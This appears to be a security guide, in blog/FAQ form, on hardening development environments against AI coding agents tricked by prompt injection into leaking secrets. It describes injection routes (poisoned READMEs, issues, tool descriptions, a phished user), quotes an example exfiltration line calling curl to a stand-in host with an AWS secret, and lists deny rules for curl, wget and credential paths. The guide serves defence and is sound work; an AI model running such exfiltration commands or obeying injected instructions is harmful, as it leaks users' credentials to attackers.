Can an AI coding agent leak my secrets?

Yes. An agent carries your privileges — API keys, a logged-in gh, the cloud credential chain — and takes instructions from text it cannot fully trust (a dependency README, a GitHub issue, a fetched web page, a poisoned MCP tool description). A successful prompt injection turns that into an action: a curl with your ~/.aws credentials in the body, or a tool call to a key it was never meant to touch. OWASP ranks prompt injection as LLM01, the top risk for LLM applications. The defense that holds is the environment — egress controls and filesystem boundaries — not the model.

How should I scope API keys for an AI coding agent?

Scope to the task, not the operator role. A human may have read-write on the whole database; an agent running a report needs SELECT on two tables, enforced at the engine. Prefer short-lived tokens (OIDC, STS, GitHub App installation tokens) that expire within minutes to an hour, so a stolen token is often dead before it can be used. The strongest pattern keeps the credential out of the agent entirely: a proxy outside its trust boundary injects the key into requests, so there is no secret in the agent’s environment to exfiltrate.

What is the most effective control against secret exfiltration?

Egress control. Exfiltration needs a network path out, so blocking all outbound traffic except an allowlist (model inference, source control, package registries, telemetry) means a coerced curl to an attacker host simply never connects. Anthropic’s reference dev container ships an init-firewall.sh that does exactly this. Audit the allowlist like IAM — if it includes a host an attacker can write to (a public gist, a webhook tester), exfiltration still has a road out.

Does least privilege stop prompt injection?

No. Least privilege and scoped credentials bound the blast radius of a successful injection — they limit what a compromised agent can reach — but an injected instruction that stays inside the agent’s allowed scope still executes. None of these controls prevent injection from occurring. That is why the OWASP AI Agent cheat sheet lists nine controls: pair least privilege with deny rules, runtime authorization outside the model’s reasoning loop, input validation, and monitoring.

How do I share an .env file with an agent or teammate without leaking it?

Avoid channels that keep a copy — Slack, email, and tickets sit in searchable archives forever, readable by any agent later pointed at that history. Use a zero-knowledge, burn-on-first-read channel like send.env.dev: the payload is encrypted in the browser, the server never sees the plaintext, and the link self-destructs after one open. A secret that exists in one place for one read cannot be scraped from a chat log.

Securing Your Dev Environment for AI Coding Agents

Is a devcontainer a security boundary?

It is isolation, not a complete boundary. A dev container runs the agent as a non-root user and confines execution, which is the right baseline. But Anthropic’s own dev container docs warn that with --dangerously-skip-permissions it "does not prevent a malicious project from exfiltrating anything accessible inside the container, including the Claude Code credentials stored in ~/.claude." Only run trusted repositories this way, never mount host secrets like ~/.ssh or cloud credential files, and use a disposable VM for genuinely hostile input.

Treat your AI coding agent as an untrusted intern: scope and expire API keys, lock down Docker egress, and assume prompt injection will exfiltrate secrets.

Securing a dev environment for an AI coding agent comes down to one assumption: treat the agent as an untrusted intern with your shell. It is useful, fast, and occasionally talked into doing something stupid by text it read in a file, an issue comment, or a web page. A successful prompt injection does not produce a rude sentence — it produces an action: a curl with your ~/.aws credentials in the body, a git push of a branch you never reviewed, a tool call to an API key it was never supposed to touch. The control that survives all of that is not the model. It is the environment.

Anthropic put the principle bluntly in its May 2026 post How we contain Claude, after an attacker phished an employee into running Claude Code with instructions to exfiltrate AWS keys: "the only defense that holds… is the environment, specifically egress controls that block the POST regardless of intent and filesystem boundaries that keep ~/.aws out of reach in the first place." This guide is the practical version of that sentence — scoped keys, locked-down Docker egress, devcontainer caveats, and how to hand secrets around without leaving a copy where an agent can read it.

TL;DR

Egress control is the one defense to set up first. If the agent cannot POST to an arbitrary host, the stolen secret has nowhere to go — block outbound traffic except an allowlist.
A devcontainer is isolation, not a complete boundary. Anthropic's own docs warn that with --dangerously-skip-permissions it "does not prevent a malicious project from exfiltrating anything accessible inside the container."
Scope keys to the task, not the operator. Prefer short-lived, narrowly scoped tokens; the agent should never hold a credential broader than the job in front of it.
Never mount host secrets. Keep ~/.ssh and cloud credential files out of the container; pass repository-scoped or expiring tokens instead.
Least privilege bounds the blast radius; it does not stop injection. Pair it with deny rules, runtime approval for risky actions, and monitoring.

What is the actual threat from an AI coding agent?

The structural problem is the confused deputy: the agent acts on your behalf and carries your privileges — API keys, a logged-in gh, a cloud credential chain — while taking instructions from text it cannot fully trust. OWASP ranks prompt injection as LLM01, the number-one risk for LLM applications, precisely because the injected instruction borrows the deputy's permissions. The blast radius is whatever the agent can reach: every tool loaded into its context is a callable endpoint, and every readable secret is a candidate for exfiltration.

Two things make this concrete rather than hypothetical. First, the injection source is rarely the user — it is a dependency's README, a GitHub issue the agent was asked to triage, a web page it fetched, or a poisoned MCP tool description. Second, the harm is a normal-looking action. Anthropic's containment team describes the case where the user themselves was the injection vector — phished into pasting malicious instructions — and notes that model-layer defenses cannot help once the human in the loop is the one being manipulated. That is the moment the environment has to catch it.

Why isn't a devcontainer a complete security boundary?

A dev container is the right baseline — it runs the agent as a non-root user, confines command execution to the container, and keeps your host toolchain out of reach. It is genuinely useful isolation. It is not a sandbox you can hand an untrusted repo and walk away from.

Anthropic's dev container documentation states the limit directly: run Claude Code with --dangerously-skip-permissions and the container "does not prevent a malicious project from exfiltrating anything accessible inside the container, including the Claude Code credentials stored in ~/.claude." The same page gives the two rules that matter most:

Only develop trusted repositories this way, and monitor what the agent does — the container shrinks the blast radius, it does not neutralise a hostile project.
Never mount host secrets. Keep ~/.ssh and cloud credential files on the host; pass repository-scoped or short-lived tokens through containerEnv or a secrets store instead. A credential you mount is a credential the agent — and anything that injects it — can read.
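
The no-host-secrets rule can be checked mechanically before a container is built. The following is a minimal Python sketch, not part of Anthropic's tooling: the function name `risky_mounts` and the list of sensitive path fragments are assumptions made for illustration, and it assumes the devcontainer.json contains no comments, since the standard `json` module rejects them.

```python
import json

# Path fragments treated as host secrets. Illustrative, not exhaustive.
SENSITIVE_FRAGMENTS = ("/.ssh", "/.aws", "/.config/gcloud", "/.azure", "/.kube")


def risky_mounts(devcontainer_json: str) -> list:
    """Return the source of every mount that looks like a host secret path."""
    config = json.loads(devcontainer_json)
    flagged = []
    for mount in config.get("mounts", []):
        # A mount is either a string ("source=...,target=...,type=bind")
        # or an object with "source", "target" and "type" keys.
        if isinstance(mount, dict):
            source = str(mount.get("source", ""))
        else:
            fields = dict(
                part.split("=", 1) for part in mount.split(",") if "=" in part
            )
            source = fields.get("source", fields.get("src", ""))
        if any(fragment in source for fragment in SENSITIVE_FRAGMENTS):
            flagged.append(source)
    return flagged
```

An empty result does not prove the container is clean, because secrets can also arrive through environment variables or files already in the repository. A non-empty result is a reason to stop before starting the agent.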

How do I scope and expire API keys for an agent?

The rule that comes out of every agent-security writeup: scope permissions to the task, not to the operator's role. A human engineer might have read-write on the whole database; an agent running a report needs SELECT on two tables and nothing else, enforced at the engine, not requested politely in a prompt. The same logic applies to every key you hand it. See the environment variable security guide for the full secrets hierarchy and rotation playbook, and environment variable best practices for least-privilege defaults.

Three patterns, in order of strength:

Pattern	What it does	Why it limits exfiltration
Scoped key	One key per task, minimum permissions, separate per environment.	A leaked key buys the attacker only what that task could already do.
Short-lived token	Mint on demand, expire within minutes to an hour (OIDC, STS, GitHub App installation tokens).	A stolen token is often dead before the attacker can use it.
Credential never reaches the agent	A proxy outside the agent's trust boundary injects the key into requests.	There is no secret in the agent's environment to exfiltrate at all.
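
As a rough illustration of the last row, here is a Python sketch of the header handling a credential-injecting proxy might perform. It is a sketch under stated assumptions, not a description of any particular product: `inject_credential` and `UPSTREAM_HOST` are hypothetical names, and the function is assumed to run in a separate process that the agent cannot read.

```python
from typing import Mapping

# Hypothetical upstream that the key is valid for.
UPSTREAM_HOST = "api.example.com"


def inject_credential(
    host: str, agent_headers: Mapping[str, str], api_key: str
) -> dict:
    """Build the headers the proxy forwards upstream.

    Runs in the proxy process, outside the agent's trust boundary. The agent
    sends an unauthenticated request to the proxy and never sees api_key.
    """
    if host != UPSTREAM_HOST:
        # Refuse to attach the key to any destination other than the upstream.
        raise PermissionError(f"proxy does not forward to {host}")
    # Drop whatever the agent set for Authorization, then attach the real key.
    forwarded = {
        name: value
        for name, value in agent_headers.items()
        if name.lower() != "authorization"
    }
    forwarded["Authorization"] = f"Bearer {api_key}"
    return forwarded
```

The design point is that the key is a parameter of the proxy, not an environment variable of the agent, so a coerced `env` or `cat` inside the agent's container has nothing to print.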

The third pattern is the one Anthropic ships in its own product surface: Claude Code's Remote Control uses "multiple short-lived, narrowly scoped credentials, each limited to a specific purpose and expiring independently, to limit the blast radius of any single compromised credential." You can apply the cheaper version today — keep the long-lived key in your CI secret store or a vault, hand the agent an expiring token, and rotate aggressively. A key that lives in a plaintext .env for six months is the worst case; a token that dies in fifteen minutes is the goal.
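
To make "scoped and expiring" concrete, the sketch below mints and checks a toy HMAC-signed token that carries one scope and an expiry time. It is an illustration only: `mint_token` and `check_token` are hypothetical helpers, the token format is invented for this example, and in practice you would rely on your provider's OIDC or STS tokens instead of rolling your own.

```python
import base64
import hashlib
import hmac
import json
import time
from typing import Optional


def mint_token(signing_key: bytes, scope: str, ttl_seconds: int,
               now: Optional[float] = None) -> str:
    """Issue a token valid for one scope until now + ttl_seconds."""
    issued = time.time() if now is None else now
    payload = json.dumps({"scope": scope, "exp": issued + ttl_seconds}).encode()
    signature = hmac.new(signing_key, payload, hashlib.sha256).digest()
    return (base64.urlsafe_b64encode(payload).decode() + "."
            + base64.urlsafe_b64encode(signature).decode())


def check_token(signing_key: bytes, token: str, required_scope: str,
                now: Optional[float] = None) -> bool:
    """Accept only an untampered, unexpired token with the required scope."""
    current = time.time() if now is None else now
    try:
        payload_b64, signature_b64 = token.split(".")
        payload = base64.urlsafe_b64decode(payload_b64)
        signature = base64.urlsafe_b64decode(signature_b64)
    except ValueError:
        # Wrong number of parts or invalid base64.
        return False
    expected = hmac.new(signing_key, payload, hashlib.sha256).digest()
    if not hmac.compare_digest(signature, expected):
        return False
    claims = json.loads(payload)
    return claims["scope"] == required_scope and current < claims["exp"]
```

The signing key stays with the service that mints and verifies tokens. The agent only ever holds the token, which stops working for any other scope immediately and for its own scope once the expiry passes.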

How do I lock down Docker egress and the filesystem?

Egress control is the defense that holds when everything else fails, because exfiltration needs a network path out. Anthropic's reference dev container ships an init-firewall.sh that blocks all outbound traffic except the domains the agent and your tools actually need — model inference, source control, package registries, telemetry. Everything else is dropped, so a coerced curl https://evil.example/?key=$AWS_SECRET simply never connects.
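
The allowlist decision itself is simple enough to sketch in a few lines of Python. This is not how init-firewall.sh is implemented, and real enforcement belongs at the network layer where the agent cannot bypass it. The host names in `ALLOWED_HOSTS` are illustrative assumptions, and `egress_allowed` is a hypothetical helper.

```python
from urllib.parse import urlsplit

# Illustrative allowlist: inference, source control, one package registry.
ALLOWED_HOSTS = frozenset({"api.anthropic.com", "github.com", "registry.npmjs.org"})


def egress_allowed(url: str, allowed_hosts=ALLOWED_HOSTS) -> bool:
    """Allow a request only when its host exactly matches an allowlist entry."""
    host = urlsplit(url).hostname  # lowercased, without port or userinfo
    if host is None:
        return False
    return host.rstrip(".") in allowed_hosts
```

Exact matching is deliberate. A suffix or substring match would accept look-alike hosts such as github.com.evil.example, and parsing the URL first means a userinfo trick like https://api.anthropic.com@evil.example/ is judged by its real host.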

Pair that with two filesystem and permission controls. Claude Code restricts writes to the working directory and its subfolders by default, and its built-in sandbox (bubblewrap on Linux, seatbelt on macOS) enforces filesystem and network isolation on Bash — Anthropic reports it cut permission prompts by 84% in internal use precisely because the boundary, not a human click, is doing the work. On top of that, deny rules are a cheap, explicit backstop:

.claude/settings.json — deny secrets and arbitrary egress

{
  "permissions": {
    "deny": [
      "Read(./secrets/**)",
      "Read(./.env)",
      "Read(~/.aws/**)",
      "Read(~/.ssh/**)",
      "Bash(curl:*)",
      "Bash(wget:*)",
      "WebFetch"
    ]
  }
}

One caveat from Anthropic's docs: curl and wget already require approval rather than being auto-approved, but only a deny rule makes the block unconditional. A rule such as Bash(curl:*) also covers only that command, not other programs that can open a connection, so the egress firewall remains the real control. Inspecting or stripping credentials from HTTPS traffic requires a TLS-terminating proxy; a plain HTTP_PROXY sees an opaque tunnel, not the request body. For anything you truly do not trust, the strongest answer in the security docs is still a disposable VM.
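
Deny rules are easy to drop by accident when a settings file is edited, so a small check in CI can confirm they are still present. The Python sketch below is one possible approach: `missing_deny_rules` is a hypothetical helper, and `REQUIRED_DENY` simply mirrors the rules listed in the settings example above. It compares rule strings literally and does not evaluate them the way Claude Code does.

```python
import json

# The deny rules from the settings example in this guide.
REQUIRED_DENY = (
    "Read(./secrets/**)",
    "Read(./.env)",
    "Read(~/.aws/**)",
    "Read(~/.ssh/**)",
    "Bash(curl:*)",
    "Bash(wget:*)",
    "WebFetch",
)


def missing_deny_rules(settings_json: str, required=REQUIRED_DENY) -> list:
    """Return the required deny rules absent from a settings.json document."""
    settings = json.loads(settings_json)
    present = set(settings.get("permissions", {}).get("deny", []))
    return sorted(set(required) - present)
```

A non-empty return value is a reasonable condition for failing the build.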

How do I share secrets without leaving a copy?

Onboarding and credential handoff are where secrets leak by habit: pasted into Slack, emailed, or dropped in a ticket, they sit in a searchable archive forever, readable by any agent later pointed at that history. Use a zero-knowledge, burn-on-first-read channel instead. That is exactly what send.env.dev is for: the payload is encrypted in the browser, the server never sees the plaintext, and the link self-destructs after one open. The guide How to Share .env Files With Your Team Securely covers the full workflow and how it compares to 1Password, Doppler, and SOPS. The rule of thumb: a secret that exists in exactly one place for exactly one read cannot be scraped from a chat log.
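
The burn-on-first-read property can be shown with a very small in-memory store. This Python sketch is not the send.env.dev implementation: `BurnOnReadStore` is a hypothetical class, and it assumes the payload was already encrypted on the sender's side, so the store only ever holds ciphertext.

```python
import secrets
from typing import Dict, Optional


class BurnOnReadStore:
    """Holds opaque ciphertext and hands each item out exactly once."""

    def __init__(self) -> None:
        self._items: Dict[str, bytes] = {}

    def put(self, ciphertext: bytes) -> str:
        """Store already-encrypted bytes and return an unguessable id."""
        item_id = secrets.token_urlsafe(16)
        self._items[item_id] = ciphertext
        return item_id

    def take(self, item_id: str) -> Optional[bytes]:
        """Return the ciphertext and delete it; later reads get None."""
        return self._items.pop(item_id, None)
```

Because `take` removes the item as it returns it, a second request for the same id finds nothing, which is the behaviour that keeps a shared secret out of any archive an agent might read later.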

A hardening checklist for AI-assisted development

Run an agent against work you do not fully trust only when every line below is true. Most of these are one-time setup; the payoff is that a single bad instruction stays contained.

Non-root user, working directory only. The agent writes to the repo bind-mount and nothing above it.
No host secrets mounted. No ~/.ssh, no ~/.aws, no cloud credential files — repository-scoped or expiring tokens only.
Egress allowlist. Outbound blocked except inference, source control, registries, and telemetry.
Deny rules for secrets and network shells. Block reads of secret paths and unrestricted curl/wget.
Human-in-the-loop for high-risk actions. Deletes, deploys, infra changes, and pushes to main require explicit approval.
No unattended push to production. A non-interactive job must not push to main, publish packages, apply infra, or run migrations without a separate approval path.
Monitoring and audit. Log tool calls and watch for anomalous network or filesystem activity — observability is the OWASP control most teams skip.
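
Two of the checklist items, human approval for high-risk actions and an audit trail, can be combined in one gate that sits outside the model. The Python sketch below is a simplified illustration: `HIGH_RISK_PREFIXES`, `needs_approval`, and `review` are hypothetical names, and prefix matching on the command line is easy to evade (for example with `git -C dir push`), so treat it as a starting point and not as a complete policy.

```python
import shlex

# Command prefixes that should never run without a human decision.
HIGH_RISK_PREFIXES = (
    ("git", "push"),
    ("npm", "publish"),
    ("terraform", "apply"),
    ("rm", "-rf"),
)


def needs_approval(command: str) -> bool:
    """Return True when the command starts with a high-risk prefix."""
    try:
        argv = tuple(shlex.split(command))
    except ValueError:
        # Unbalanced quotes: do not guess, escalate to a human.
        return True
    return any(argv[: len(prefix)] == prefix for prefix in HIGH_RISK_PREFIXES)


def review(command: str, audit_log: list) -> str:
    """Record every command and return 'ask' or 'allow'."""
    decision = "ask" if needs_approval(command) else "allow"
    audit_log.append({"command": command, "decision": decision})
    return decision
```

Every command is logged whether or not it needs approval, so the audit trail stays complete even when nothing was blocked.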

When does this approach fall short?

Scoped keys do not stop injection — they cap it. An injected instruction that stays inside the agent's allowed scope still executes. Least privilege shrinks the damage; it does not prevent the act.
Containers are isolation, not a verdict. A privileged process outside the sandbox decides, command by command, whether the sandbox is enforced, and a persuasive injected prompt or a fatigued approval click can still get something through. Use a disposable VM for genuinely hostile input.
An allowlist is only as tight as its entries. If your egress allowlist includes a host an attacker can write to — a public gist, a webhook tester, your own telemetry sink — exfiltration has a road out. Audit the allowlist like you audit IAM.
Defense-in-depth or nothing. No single layer is sufficient. Runtime authorization that lives outside the model's reasoning loop, input validation, and monitoring are the rest of the stack — the OWASP cheat sheet lists nine controls for a reason.
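
Auditing the allowlist like IAM can start with a simple lint. The Python sketch below flags wildcard entries and hosts where third parties can publish or receive data. The `USER_WRITABLE_HOSTS` set is a small illustrative assumption, not a vetted list, and `audit_allowlist` is a hypothetical helper.

```python
# Hosts where anyone can create content or capture requests. Illustrative only.
USER_WRITABLE_HOSTS = frozenset({
    "gist.github.com",
    "gist.githubusercontent.com",
    "webhook.site",
    "pastebin.com",
})


def audit_allowlist(allowlist) -> list:
    """Return (entry, reason) pairs for allowlist entries that need review."""
    findings = []
    for entry in allowlist:
        host = entry.strip().lower()
        if host.startswith("*."):
            findings.append((entry, "wildcard admits unreviewed subdomains"))
            host = host[2:]
        if host in USER_WRITABLE_HOSTS:
            findings.append((entry, "third parties can publish or receive data here"))
    return findings
```

A lint like this cannot tell whether your own telemetry sink is writable by an attacker, so entries it passes still deserve a manual look.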

Primary sources

Anthropic — How we contain Claude (May 2026; the egress-and-filesystem "defense that holds" framing and the user-as-injection-vector incident).
Anthropic — Claude Code sandboxing (filesystem + network isolation, bubblewrap/seatbelt, the 84% prompt reduction).
Claude Code — Development containers (the "not a complete boundary" warning, no-host-secrets rule, init-firewall.sh).
Claude Code — Security (read-only default, deny rules, network-command approval, scoped short-lived credentials).
OWASP — AI Agent Security Cheat Sheet (least privilege, tool scoping, runtime authorization, human-in-the-loop, monitoring).
